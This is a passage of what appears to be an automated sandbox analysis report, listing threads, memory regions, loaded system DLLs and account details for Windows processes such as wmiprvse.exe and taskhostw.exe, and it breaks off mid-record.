"private_0x00007ff7b3abc000" filename = "" Region: id = 6065 start_va = 0x7ffbeda30000 end_va = 0x7ffbeda57fff entry_point = 0x7ffbeda30000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Thread: id = 25 os_tid = 0xadc Thread: id = 26 os_tid = 0xb1c Thread: id = 27 os_tid = 0xa38 Thread: id = 28 os_tid = 0xbd4 Thread: id = 29 os_tid = 0xc28 Thread: id = 30 os_tid = 0xc30 Thread: id = 31 os_tid = 0xfb0 Thread: id = 32 os_tid = 0xfac Thread: id = 33 os_tid = 0xfa8 Thread: id = 34 os_tid = 0xf68 Thread: id = 35 os_tid = 0xf64 Thread: id = 36 os_tid = 0xe6c Thread: id = 37 os_tid = 0xdc0 Thread: id = 38 os_tid = 0xd18 Thread: id = 39 os_tid = 0xa14 Thread: id = 40 os_tid = 0x798 Thread: id = 41 os_tid = 0x878 Thread: id = 42 os_tid = 0x870 Thread: id = 43 os_tid = 0x784 Thread: id = 44 os_tid = 0x780 Thread: id = 45 os_tid = 0x754 Thread: id = 46 os_tid = 0x750 Thread: id = 47 os_tid = 0x740 Thread: id = 48 os_tid = 0x73c Thread: id = 49 os_tid = 0x738 Thread: id = 50 os_tid = 0x734 Thread: id = 51 os_tid = 0x688 Thread: id = 52 os_tid = 0x730 Thread: id = 53 os_tid = 0x724 Thread: id = 54 os_tid = 0x71c Thread: id = 55 os_tid = 0x70c Thread: id = 56 os_tid = 0x708 Thread: id = 57 os_tid = 0x6f4 Thread: id = 58 os_tid = 0x6ec Thread: id = 59 os_tid = 0x6d4 Thread: id = 60 os_tid = 0x6b4 Thread: id = 61 os_tid = 0x694 Thread: id = 62 os_tid = 0x680 Thread: id = 63 os_tid = 0x664 Thread: id = 64 os_tid = 0x650 Thread: id = 65 os_tid = 0x64c Thread: id = 66 os_tid = 0x630 Thread: id = 67 os_tid = 0x628 Thread: id = 68 os_tid = 0x5f8 Thread: id = 69 os_tid = 0x5e4 Thread: id = 70 os_tid = 0x5cc Thread: id = 71 os_tid = 0x5c4 Thread: id = 72 os_tid = 0x574 Thread: id = 73 os_tid = 0x558 Thread: id = 74 os_tid = 0x530 Thread: id = 75 os_tid = 0x4dc Thread: id = 76 os_tid = 0x414 Thread: id = 77 os_tid = 0x118 Thread: id = 78 os_tid = 0xfc Thread: id = 79 os_tid = 0x140 Thread: id = 80 os_tid = 0x1a0 Thread: id = 81 os_tid = 0x14c Thread: id = 82 os_tid = 0x154 Thread: id = 83 os_tid = 0x130 Thread: id = 84 os_tid = 0x160 Thread: id = 85 os_tid = 0xf8 Thread: id = 86 os_tid = 0x3dc Thread: id = 87 os_tid = 0x3d8 Thread: id = 88 os_tid = 0x3d0 Thread: id = 89 os_tid = 0x3cc Thread: id = 90 os_tid = 0x3c8 Thread: id = 91 os_tid = 0x37c Thread: id = 92 os_tid = 0x42c Thread: id = 93 os_tid = 0x7bc Thread: id = 94 os_tid = 0xb04 Thread: id = 95 os_tid = 0x75c Thread: id = 96 os_tid = 0x8ac Thread: id = 97 os_tid = 0xbc0 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x1d2a9000" os_pid = "0xb20" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0007b882" [0xc000000f] Region: id = 5940 start_va = 0x290000 end_va = 0x2f8fff entry_point = 0x290000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmiprvse.exe") Region: id = 5941 start_va = 0x780000 end_va = 0x477ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5942 start_va = 0x4780000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 5943 start_va = 0x47a0000 end_va = 0x47a0fff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 5944 start_va = 0x47b0000 end_va = 0x47c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047b0000" filename = "" Region: id = 5945 start_va = 0x47d0000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 5946 start_va = 0x4810000 end_va = 0x484ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 5947 start_va = 0x4850000 end_va = 0x4853fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004850000" filename = "" Region: id = 5948 start_va = 0x4860000 end_va = 0x4860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 5949 start_va = 0x4870000 end_va = 0x4871fff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 5950 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5951 start_va = 0x7f290000 end_va = 0x7f2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f290000" filename = "" Region: id = 5952 start_va = 0x7f2bb000 end_va = 0x7f2bbfff entry_point = 0x0 region_type = private name = "private_0x000000007f2bb000" filename = "" Region: id = 5953 start_va = 0x7f2bc000 end_va = 0x7f2befff entry_point = 0x0 region_type = private name = "private_0x000000007f2bc000" filename = "" Region: id = 5954 start_va = 0x7f2bf000 end_va = 0x7f2bffff entry_point = 0x0 region_type = private name = "private_0x000000007f2bf000" filename = "" Region: id = 5955 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5956 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5957 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5958 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5959 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5960 start_va = 0x4a00000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 5961 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5962 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5963 start_va = 0x48a0000 end_va = 0x499ffff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 5964 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5965 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5966 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5967 start_va = 0x4780000 end_va = 0x478ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 5968 start_va = 0x4790000 end_va = 0x4797fff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 5969 start_va = 0x49a0000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 5970 start_va = 0x4a10000 end_va = 0x4acdfff entry_point = 0x4a10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5971 start_va = 0x4ad0000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 5972 start_va = 0x4c40000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 5973 start_va = 0x738a0000 end_va = 0x738b1fff entry_point = 0x738a0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\SysWOW64\\ncobjapi.dll" (normalized: "c:\\windows\\syswow64\\ncobjapi.dll") Region: id = 5974 start_va = 0x738c0000 end_va = 0x7397bfff entry_point = 0x738c0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5975 start_va = 0x73b30000 end_va = 0x73b95fff entry_point = 0x73b30000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5976 start_va = 0x74910000 end_va = 0x7492afff entry_point = 0x74910000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5977 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5978 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5979 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5980 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5981 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5982 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5983 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5984 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5985 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5986 start_va = 0x7f190000 end_va = 0x7f28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f190000" filename = "" Region: id = 5987 start_va = 0x7f2b8000 end_va = 0x7f2bafff entry_point = 0x0 region_type = private name = "private_0x000000007f2b8000" filename = "" Region: id = 5988 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5989 start_va = 0x4c50000 end_va = 0x4f86fff entry_point = 0x4c50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5990 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5991 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5992 start_va = 0x47a0000 end_va = 0x47a0fff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 5993 start_va = 0x4880000 end_va = 0x4880fff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 5994 start_va = 0x4890000 end_va = 0x4894fff entry_point = 0x4890000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 5995 start_va = 0x49e0000 end_va = 0x49e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 5996 start_va = 0x49f0000 end_va = 0x49f7fff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 5997 start_va = 0x4b10000 end_va = 0x4bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 5998 start_va = 0x4bd0000 end_va = 0x4c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 5999 start_va = 0x4c10000 end_va = 0x4c10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 6000 start_va = 0x4c20000 end_va = 0x4c20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c20000" filename = "" Region: id = 6001 start_va = 0x4f90000 end_va = 0x5117fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f90000" filename = "" Region: id = 6002 start_va = 0x5120000 end_va = 0x52a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005120000" filename = "" Region: id = 6003 start_va = 0x52b0000 end_va = 0x52effff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 6004 start_va = 0x52f0000 end_va = 0x53effff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 6005 start_va = 0x53f0000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 6006 start_va = 0x5430000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 6007 start_va = 0x5470000 end_va = 0x54affff entry_point = 0x0 region_type = private name = "private_0x0000000005470000" filename = "" Region: id = 6008 start_va = 0x54b0000 end_va = 0x54effff entry_point = 0x0 region_type = private name = "private_0x00000000054b0000" filename = "" Region: id = 6009 start_va = 0x54f0000 end_va = 0x552ffff entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 6010 start_va = 0x5530000 end_va = 0x556ffff entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 6011 start_va = 0x5570000 end_va = 0x55affff entry_point = 0x0 region_type = private name = "private_0x0000000005570000" filename = "" Region: id = 6012 start_va = 0x55b0000 end_va = 0x55effff entry_point = 0x0 region_type = private name = "private_0x00000000055b0000" filename = "" Region: id = 6013 start_va = 0x55f0000 end_va = 0x562ffff entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 6014 start_va = 0x5630000 end_va = 0x566ffff entry_point = 0x0 region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 6015 start_va = 0x5670000 end_va = 0x56affff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 6016 start_va = 0x56b0000 end_va = 0x56effff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 6017 start_va = 0x73880000 end_va = 0x7389dfff entry_point = 0x73880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 6018 start_va = 0x73980000 end_va = 0x73990fff entry_point = 0x73980000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 6019 start_va = 0x73ba0000 end_va = 0x73bacfff entry_point = 0x73ba0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6020 start_va = 0x74610000 end_va = 0x7463efff entry_point = 0x74610000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6021 start_va = 0x74930000 end_va = 0x74942fff entry_point = 0x74930000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6022 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6023 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6024 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6025 start_va = 0x7f17e000 end_va = 0x7f180fff entry_point = 0x0 region_type = private name = "private_0x000000007f17e000" filename = "" Region: id = 6026 start_va = 0x7f181000 end_va = 0x7f183fff entry_point = 0x0 region_type = private name = "private_0x000000007f181000" filename = "" Region: id = 6027 start_va = 0x7f184000 end_va = 0x7f186fff entry_point = 0x0 region_type = private name = "private_0x000000007f184000" filename = "" Region: id = 6028 start_va = 0x7f187000 end_va = 0x7f189fff entry_point = 0x0 region_type = private name = "private_0x000000007f187000" filename = "" Region: id = 6029 start_va = 0x7f18a000 end_va = 0x7f18cfff entry_point = 0x0 region_type = private name = "private_0x000000007f18a000" filename = "" Region: id = 6030 start_va = 0x7f18d000 end_va = 0x7f18ffff entry_point = 0x0 region_type = private name = "private_0x000000007f18d000" filename = "" Region: id = 6031 start_va = 0x7f2b5000 end_va = 0x7f2b7fff entry_point = 0x0 region_type = private name = "private_0x000000007f2b5000" filename = "" Region: id = 6032 start_va = 0x73710000 end_va = 0x73720fff entry_point = 0x73710000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 6033 start_va = 0x73730000 end_va = 0x7384afff entry_point = 0x73730000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 6034 start_va = 0x73850000 end_va = 0x73870fff entry_point = 0x73850000 region_type = mapped_file name = "vsswmi.dll" filename = "\\Windows\\SysWOW64\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\syswow64\\wbem\\vsswmi.dll") Region: id = 6035 start_va = 0x73bb0000 end_va = 0x73beefff entry_point = 0x73bb0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Thread: id = 98 os_tid = 0xb0 Thread: id = 99 os_tid = 0xb58 Thread: id = 100 os_tid = 0x778 Thread: id = 101 os_tid = 0x518 Thread: id = 102 os_tid = 0xcec Thread: id = 103 os_tid = 0xd30 Thread: id = 104 os_tid = 0xd58 Thread: id = 105 os_tid = 0xd74 Thread: id = 106 os_tid = 0xd6c Process: id = "6" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x5730c000" os_pid = "0x4cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x378" cmd_line = "taskhostw.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6074 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6075 start_va = 0x3105920000 end_va = 0x310593ffff entry_point = 0x0 region_type = private name = "private_0x0000003105920000" filename = "" Region: id = 6076 start_va = 0x3105940000 end_va = 0x3105953fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105940000" filename = "" Region: id = 6077 start_va = 0x3105960000 end_va = 0x31059dffff entry_point = 0x0 region_type = private name = "private_0x0000003105960000" filename = "" Region: id = 6078 start_va = 0x31059e0000 end_va = 0x31059e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031059e0000" filename = "" Region: id = 6079 start_va = 0x31059f0000 end_va = 0x31059f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031059f0000" filename = "" Region: id = 6080 start_va = 0x3105a00000 end_va = 0x3105a01fff entry_point = 0x0 region_type = private name = "private_0x0000003105a00000" filename = "" Region: id = 6081 start_va = 0x7df5ff0f0000 end_va = 0x7ff5ff0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0f0000" filename = "" Region: id = 6082 start_va = 0x7ff716db0000 end_va = 0x7ff716dd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff716db0000" filename = "" Region: id = 6083 start_va = 0x7ff716ddd000 end_va = 0x7ff716dddfff entry_point = 0x0 region_type = private name = "private_0x00007ff716ddd000" filename = "" Region: id = 6084 start_va = 0x7ff716dde000 end_va = 0x7ff716ddffff entry_point = 0x0 region_type = private name = "private_0x00007ff716dde000" filename = "" Region: id = 6085 start_va = 0x7ff7179e0000 end_va = 0x7ff7179f8fff entry_point = 0x7ff7179e0000 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 6086 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6087 start_va = 0x3105920000 end_va = 0x310592ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105920000" filename = "" Region: id = 6088 start_va = 0x3105930000 end_va = 0x3105936fff entry_point = 0x0 region_type = private name = "private_0x0000003105930000" filename = "" Region: id = 6089 start_va = 0x3105a10000 end_va = 0x3105acdfff entry_point = 0x3105a10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6090 start_va = 0x3105ad0000 end_va = 0x3105b4ffff entry_point = 0x0 region_type = private name = "private_0x0000003105ad0000" filename = "" Region: id = 6091 start_va = 0x3105b80000 end_va = 0x3105c7ffff entry_point = 0x0 region_type = private name = "private_0x0000003105b80000" filename = "" Region: id = 6092 start_va = 0x3105d80000 end_va = 0x3105d8ffff entry_point = 0x0 region_type = private name = "private_0x0000003105d80000" filename = "" Region: id = 6093 start_va = 0x7ff716cb0000 end_va = 0x7ff716daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff716cb0000" filename = "" Region: id = 6094 start_va = 0x7ff716ddb000 end_va = 0x7ff716ddcfff entry_point = 0x0 region_type = private name = "private_0x00007ff716ddb000" filename = "" Region: id = 6095 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6096 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6097 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6098 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6099 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6100 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6101 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6102 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6103 start_va = 0x3105b50000 end_va = 0x3105b56fff entry_point = 0x0 region_type = private name = "private_0x0000003105b50000" filename = "" Region: id = 6104 start_va = 0x3105b60000 end_va = 0x3105b60fff entry_point = 0x3105b60000 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 6105 start_va = 0x3105b70000 end_va = 0x3105b70fff entry_point = 0x0 region_type = private name = "private_0x0000003105b70000" filename = "" Region: id = 6106 start_va = 0x3105c80000 end_va = 0x3105cfffff entry_point = 0x0 region_type = private name = "private_0x0000003105c80000" filename = "" Region: id = 6107 start_va = 0x3105d00000 end_va = 0x3105d00fff entry_point = 0x0 region_type = private name = "private_0x0000003105d00000" filename = "" Region: id = 6108 start_va = 0x3105d90000 end_va = 0x3105f17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105d90000" filename = "" Region: id = 6109 start_va = 0x3105f20000 end_va = 0x31060a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105f20000" filename = "" Region: id = 6110 start_va = 0x31060b0000 end_va = 0x31074affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031060b0000" filename = "" Region: id = 6111 start_va = 0x7ff716dd9000 end_va = 0x7ff716ddafff entry_point = 0x0 region_type = private name = "private_0x00007ff716dd9000" filename = "" Region: id = 6112 start_va = 0x7ffc015f0000 end_va = 